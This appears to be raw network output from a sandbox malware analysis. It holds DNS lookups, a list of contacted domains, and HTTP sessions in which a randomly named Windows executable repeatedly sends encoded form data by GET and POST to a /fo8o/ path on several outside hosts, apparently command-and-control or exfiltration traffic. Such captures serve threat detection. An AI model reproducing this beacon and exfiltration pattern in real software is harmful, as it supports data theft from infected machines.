Nov 25, 2024 18:14:34.288746119 CET | 1.1.1.1 | 192.168.2.4 | 0xaac4 | No error (0) | elettrosistemista.zip | | 195.110.124.133 | A (IP address) | IN (0x0001) | false
Nov 25, 2024 18:14:48.947113037 CET | 1.1.1.1 | 192.168.2.4 | 0xfb36 | Name error (3) | www.donnavariedades.com | none | none | A (IP address) | IN (0x0001) | false
Nov 25, 2024 18:14:57.409828901 CET | 1.1.1.1 | 192.168.2.4 | 0x1282 | Name error (3) | www.660danm.top | none | none | A (IP address) | IN (0x0001) | false
Nov 25, 2024 18:15:06.089353085 CET | 1.1.1.1 | 192.168.2.4 | 0x6c65 | No error (0) | www.empowermedeco.com | empowermedeco.com | | CNAME (Canonical name) | IN (0x0001) | false
Nov 25, 2024 18:15:06.089353085 CET | 1.1.1.1 | 192.168.2.4 | 0x6c65 | No error (0) | empowermedeco.com | | 217.196.55.202 | A (IP address) | IN (0x0001) | false
Nov 25, 2024 18:15:21.297362089 CET | 1.1.1.1 | 192.168.2.4 | 0x8114 | Name error (3) | www.joyesi.xyz | none | none | A (IP address) | IN (0x0001) | false
• www.3xfootball.com
• www.goldenjade-travel.com
• www.magmadokum.com
• www.rssnewscast.com
• www.techchains.info
• www.elettrosistemista.zip
• www.empowermedeco.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49736 | 154.215.72.110 | 80 | 5580 | C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exe
Timestamp | Bytes transferred | Direction | Data
Nov 25, 2024 18:11:45.475092888 CET | 506 | OUT | GET /fo8o/?7BpTBrLp=IhZyPQIGe6uK3zPwzgZotr9BPg6ZX3xlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOn1bCAV966J7ZkoXS5ptBuz2edhBZoh3xN24c=&3vjHf=mRWd HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en
Host: www.3xfootball.com
Connection: close
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Nov 25, 2024 18:11:47.039231062 CET | 691 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Mon, 25 Nov 2024 17:11:46 GMT
Content-Type: text/html
Content-Length: 548
Connection: close
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49737 | 116.50.37.244 | 80 | 5580 | C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exe
Timestamp | Bytes transferred | Direction | Data
Nov 25, 2024 18:12:11.509748936 CET | 800 | OUT | POST /fo8o/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en
Accept-Encoding: gzip, deflate, br
Host: www.goldenjade-travel.com
Origin: http://www.goldenjade-travel.com
Cache-Control: no-cache
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 205
Referer: http://www.goldenjade-travel.com/fo8o/
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                  Data Raw: 37 42 70 54 42 72 4c 70 3d 47 48 69 4b 78 65 34 51 36 56 68 4b 4b 65 73 4d 4c 77 6e 74 6b 63 45 31 2b 61 49 63 6f 52 36 64 71 4d 45 4c 35 73 65 2f 4a 2f 34 67 4d 70 64 73 71 50 73 32 2f 73 43 39 6a 37 30 39 63 4b 2f 45 2f 7a 69 79 36 4e 4a 44 48 74 37 63 4b 6f 54 4e 62 4e 2f 53 68 78 59 46 6f 58 49 44 71 59 6f 55 62 37 2b 37 47 5a 56 62 57 32 55 47 43 63 58 30 4a 68 4c 59 6e 5a 50 58 32 76 76 30 79 6f 5a 4c 72 4e 6b 43 44 61 4f 77 5a 50 65 6f 6b 33 6c 4c 70 2b 36 45 49 54 62 77 66 66 66 57 47 32 62 66 4f 64 4c 4e 69 4b 4e 35 6c 6e 6e 59 57 6a 72 30 50 55 51 69 66 77 72 76 4a 78 5a 5a 4d 4e 6d 50 57 67 3d 3d
                                                                                  Data Ascii: 7BpTBrLp=GHiKxe4Q6VhKKesMLwntkcE1+aIcoR6dqMEL5se/J/4gMpdsqPs2/sC9j709cK/E/ziy6NJDHt7cKoTNbN/ShxYFoXIDqYoUb7+7GZVbW2UGCcX0JhLYnZPX2vv0yoZLrNkCDaOwZPeok3lLp+6EITbwfffWG2bfOdLNiKN5lnnYWjr0PUQifwrvJxZZMNmPWg==
Nov 25, 2024 18:12:13.098665953 CET | 492 | IN | HTTP/1.1 404 Not Found
Content-Type: text/html; charset=us-ascii
Server: Microsoft-HTTPAPI/2.0
Date: Mon, 25 Nov 2024 17:12:12 GMT
Connection: close
Content-Length: 315
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49740 | 116.50.37.244 | 80 | 5580 | C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exe
Timestamp | Bytes transferred | Direction | Data
Nov 25, 2024 18:12:14.163758039 CET | 820 | OUT | POST /fo8o/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en
Accept-Encoding: gzip, deflate, br
Host: www.goldenjade-travel.com
Origin: http://www.goldenjade-travel.com
Cache-Control: no-cache
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 225
Referer: http://www.goldenjade-travel.com/fo8o/
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                  Data Raw: 37 42 70 54 42 72 4c 70 3d 47 48 69 4b 78 65 34 51 36 56 68 4b 4c 2b 38 4d 59 48 7a 74 74 63 45 79 78 36 49 63 6a 78 36 42 71 4d 49 4c 35 70 6d 57 4a 4a 49 67 4e 4e 5a 73 74 39 55 32 79 4d 43 39 72 62 30 34 44 61 2f 4e 2f 79 65 36 36 4d 5a 44 48 74 76 63 4b 73 66 4e 62 64 44 56 77 78 59 62 68 33 49 42 6c 34 6f 55 62 37 2b 37 47 5a 41 4d 57 31 6b 47 43 73 6e 30 4a 45 6d 4f 75 35 50 55 78 76 76 30 6b 59 5a 50 72 4e 6b 67 44 5a 4b 4f 5a 4a 43 6f 6b 32 56 4c 70 76 36 4c 44 54 62 32 52 2f 65 78 50 57 71 70 45 38 71 52 6b 5a 74 32 71 6b 44 69 54 6c 36 75 65 6c 78 31 4e 77 50 63 55 32 51 74 42 4f 62 47 4e 6b 77 72 32 43 59 67 38 41 68 2b 2f 4a 67 36 67 70 45 6a 72 56 55 3d
                                                                                  Data Ascii: 7BpTBrLp=GHiKxe4Q6VhKL+8MYHzttcEyx6Icjx6BqMIL5pmWJJIgNNZst9U2yMC9rb04Da/N/ye66MZDHtvcKsfNbdDVwxYbh3IBl4oUb7+7GZAMW1kGCsn0JEmOu5PUxvv0kYZPrNkgDZKOZJCok2VLpv6LDTb2R/exPWqpE8qRkZt2qkDiTl6uelx1NwPcU2QtBObGNkwr2CYg8Ah+/Jg6gpEjrVU=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49748 | 116.50.37.244 | 80 | 5580 | C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exe
Timestamp | Bytes transferred | Direction | Data
Nov 25, 2024 18:12:16.954519033 CET | 10902 | OUT | POST /fo8o/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en
Accept-Encoding: gzip, deflate, br
Host: www.goldenjade-travel.com
Origin: http://www.goldenjade-travel.com
Cache-Control: no-cache
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 10305
Referer: http://www.goldenjade-travel.com/fo8o/
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                  Data Raw: 37 42 70 54 42 72 4c 70 3d 47 48 69 4b 78 65 34 51 36 56 68 4b 4c 2b 38 4d 59 48 7a 74 74 63 45 79 78 36 49 63 6a 78 36 42 71 4d 49 4c 35 70 6d 57 4a 4a 41 67 4e 34 4e 73 75 63 55 32 7a 4d 43 39 30 72 30 35 44 61 2b 4e 2f 7a 32 32 36 4d 56 54 48 75 58 63 4c 4a 44 4e 4d 2f 6e 56 70 68 59 62 73 58 49 41 71 59 70 4f 62 36 4f 2f 47 5a 51 4d 57 31 6b 47 43 75 2f 30 50 52 4b 4f 6f 35 50 58 32 76 76 6f 79 6f 59 53 72 4e 38 4b 44 59 2f 37 5a 2f 79 6f 71 31 74 4c 73 64 43 4c 4f 54 62 30 53 2f 65 70 50 57 6d 36 45 38 6d 64 6b 59 49 62 71 6e 66 69 65 30 2f 78 4c 31 6c 5a 52 68 6e 6e 47 47 38 30 5a 50 75 46 57 32 34 52 38 33 5a 36 75 7a 68 41 38 70 49 79 36 71 70 35 32 67 37 47 6f 59 53 59 56 49 68 50 49 33 76 65 67 37 42 74 6a 76 48 74 63 6e 51 35 58 36 36 46 6f 2f 61 42 35 66 75 48 4b 75 73 68 32 58 31 32 56 6f 59 48 76 33 4f 77 2b 5a 55 2b 78 63 32 41 71 79 6c 65 38 74 45 58 6b 41 56 2f 49 78 6b 4a 66 6b 30 51 50 51 44 61 69 4c 6c 4c 55 6a 37 41 31 6e 65 50 54 4a 73 75 48 61 37 32 65 43 66 48 68 58 7a 6f 45 [TRUNCATED]
                                                                                  Data Ascii: 7BpTBrLp=GHiKxe4Q6VhKL+8MYHzttcEyx6Icjx6BqMIL5pmWJJAgN4NsucU2zMC90r05Da+N/z226MVTHuXcLJDNM/nVphYbsXIAqYpOb6O/GZQMW1kGCu/0PRKOo5PX2vvoyoYSrN8KDY/7Z/yoq1tLsdCLOTb0S/epPWm6E8mdkYIbqnfie0/xL1lZRhnnGG80ZPuFW24R83Z6uzhA8pIy6qp52g7GoYSYVIhPI3veg7BtjvHtcnQ5X66Fo/aB5fuHKush2X12VoYHv3Ow+ZU+xc2Aqyle8tEXkAV/IxkJfk0QPQDaiLlLUj7A1nePTJsuHa72eCfHhXzoErbJI7p0dZ0pvtJLPZCNBbfkZZuwld9LpKhkNEJcSFOpl0hwuQzM9OQ/06997bt03YSdIl1xfzR1paiBmgpgShwwcgWK2BHOIJ9pQzQmp/aD7JQSgbpKyX1LMz97dC3vpXT3T1LmfKc9RuG9FmNkX7rQVVFILVYi6fvP8mkfpU7Ub0LSpcQNjipOC0C/C+nZq/IVMWXhXRD53Din+vxQqiZwpVUJitjjiixIvySAQTu7i2pB2AbFWoNuRZF040YNoZpACYJlJyTbOftlZduaTAPmKC17B0A12pI4KZk94p8f7ouqcGtZpOv+7FgBiooP+OK41b6hivVy32G5UaAEsxSpFLYPJBxa1ZdR+vlj9IPg+HYBFaY3ZcsS4vBiQvd8+YEtGOTttG4kJLaib5p9RHFexGC5PDr6OwcxU/+X6wqyXE4SSRslpqvOvtYg54LeLHsKS7XiPqU35EdT52sfLN1AkWYVAqSNJ48HgNyqyX76+L+QJcUICRB5XPJiCkT4c5xhxV5sZh8T14Qm+BCAWAVGAb8okuU5+LbGl0CaMHYmni6NYZMRIBwwGzlHkVarquRdNwmCte0coo2aX+9i/xOFsUkIK3Ux/fgJ2rn0ElRR0LKiSxqU/5yT+uC1HI1lkflUrMhIcrcSKK5VXxofzw1KR7NuTOVYykv [TRUNCATED]
Nov 25, 2024 18:12:18.516350985 CET | 492 | IN | HTTP/1.1 404 Not Found
Content-Type: text/html; charset=us-ascii
Server: Microsoft-HTTPAPI/2.0
Date: Mon, 25 Nov 2024 17:12:17 GMT
Connection: close
Content-Length: 315
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49757 | 116.50.37.244 | 80 | 5580 | C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exe
Timestamp | Bytes transferred | Direction | Data
Nov 25, 2024 18:12:19.609487057 CET | 513 | OUT | GET /fo8o/?7BpTBrLp=LFKqyrcu7g1NCa8bLlrIs+M38ZMJrQSprIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaF2zMIkigvi6pIX6i8MuAeXHNrENDnI2WJi/4=&3vjHf=mRWd HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en
Host: www.goldenjade-travel.com
Connection: close
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Nov 25, 2024 18:12:21.188296080 CET | 492 | IN | HTTP/1.1 404 Not Found
Content-Type: text/html; charset=us-ascii
Server: Microsoft-HTTPAPI/2.0
Date: Mon, 25 Nov 2024 17:12:20 GMT
Connection: close
Content-Length: 315
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.4 | 49791 | 85.159.66.93 | 80 | 5580 | C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exe
Timestamp | Bytes transferred | Direction | Data
Nov 25, 2024 18:12:35.389682055 CET | 779 | OUT | POST /fo8o/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en
Accept-Encoding: gzip, deflate, br
Host: www.magmadokum.com
Origin: http://www.magmadokum.com
Cache-Control: no-cache
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 205
Referer: http://www.magmadokum.com/fo8o/
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                  Data Raw: 37 42 70 54 42 72 4c 70 3d 6e 4a 66 48 4a 5a 79 53 51 6d 6f 6b 62 4a 72 44 58 6d 7a 45 6b 6b 4b 2b 65 41 4e 6a 6e 42 2f 58 63 78 41 41 64 50 47 4a 53 64 6c 77 41 6f 2b 4c 59 71 50 65 6a 7a 49 30 2b 38 47 36 31 68 36 56 71 51 5a 2f 6e 41 31 35 43 52 7a 30 6f 38 31 47 64 7a 57 32 62 6b 49 42 59 36 52 64 37 4f 63 4a 47 69 32 32 38 68 6b 69 56 41 77 4b 42 66 6f 6d 64 51 57 2f 43 53 33 4a 47 2f 59 53 5a 70 63 58 66 74 30 42 75 77 6c 44 43 67 4f 4f 50 7a 4a 35 30 6b 54 61 43 73 48 69 48 6b 71 2f 30 30 2b 52 30 6b 37 45 61 72 56 62 45 53 75 75 52 42 67 2b 62 76 78 5a 38 35 44 44 61 79 53 41 48 58 4c 67 73 77 3d 3d
                                                                                  Data Ascii: 7BpTBrLp=nJfHJZySQmokbJrDXmzEkkK+eANjnB/XcxAAdPGJSdlwAo+LYqPejzI0+8G61h6VqQZ/nA15CRz0o81GdzW2bkIBY6Rd7OcJGi228hkiVAwKBfomdQW/CS3JG/YSZpcXft0BuwlDCgOOPzJ50kTaCsHiHkq/00+R0k7EarVbESuuRBg+bvxZ85DDaySAHXLgsw==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.4 | 49798 | 85.159.66.93 | 80 | 5580 | C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exe
Timestamp | Bytes transferred | Direction | Data
Nov 25, 2024 18:12:38.046266079 CET | 799 | OUT | POST /fo8o/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en
Accept-Encoding: gzip, deflate, br
Host: www.magmadokum.com
Origin: http://www.magmadokum.com
Cache-Control: no-cache
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 225
Referer: http://www.magmadokum.com/fo8o/
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Data Ascii: 7BpTBrLp=nJfHJZySQmokaqDDVBvEjEK/bANjth/Tcx8AdMLUTo9wAJiLWLPegzI0msG/rR6OqQUcnBJ5CRP0o+tGeDq1a0IDVaRDmecJGi228hgIVAoKBLUmSVqwMy3IWvYSdpcTft0zuxImClCOPy5501TFXcHkDkrL8Ujg50K5E605Dme3QHxkKeQOu5nwH1b0KU2p314UqTsJyG6NhniK+ohDMIM=


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
7          | 192.168.2.4 | 49805       | 85.159.66.93   | 80               | 5580 | C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exe

Timestamp                           | Bytes transferred | Direction | Data
Nov 25, 2024 18:12:40.697352886 CET | 10881             | OUT       | POST /fo8o/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en
Accept-Encoding: gzip, deflate, br
Host: www.magmadokum.com
Origin: http://www.magmadokum.com
Cache-Control: no-cache
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 10305
Referer: http://www.magmadokum.com/fo8o/
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Data Ascii: 7BpTBrLp= [TRUNCATED]


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
8          | 192.168.2.4 | 49811       | 85.159.66.93   | 80               | 5580 | C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exe

Timestamp                           | Bytes transferred | Direction | Data
Nov 25, 2024 18:12:43.356072903 CET | 506               | OUT       | GET /fo8o/?7BpTBrLp=qL3nKp+YSjoaTomnOzyxpXPFUBhLgkHGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjKFgJSPFkq5dbaCOx4WcoETVBbNsEZyvIPzk=&3vjHf=mRWd HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en
Host: www.magmadokum.com
Connection: close
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Nov 25, 2024 18:13:44.783057928 CET | 194               | IN        | HTTP/1.0 504 Gateway Time-out
Cache-Control: no-cache
Connection: close
Content-Type: text/html
Data Ascii: <html><body><h1>504 Gateway Time-out</h1>The server didn't respond in time.</body></html>


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
9          | 192.168.2.4 | 49937       | 91.195.240.94  | 80               | 5580 | C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exe

Timestamp                           | Bytes transferred | Direction | Data
Nov 25, 2024 18:13:50.260495901 CET | 782               | OUT       | POST /fo8o/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en
Accept-Encoding: gzip, deflate, br
Host: www.rssnewscast.com
Origin: http://www.rssnewscast.com
Cache-Control: no-cache
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 205
Referer: http://www.rssnewscast.com/fo8o/
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
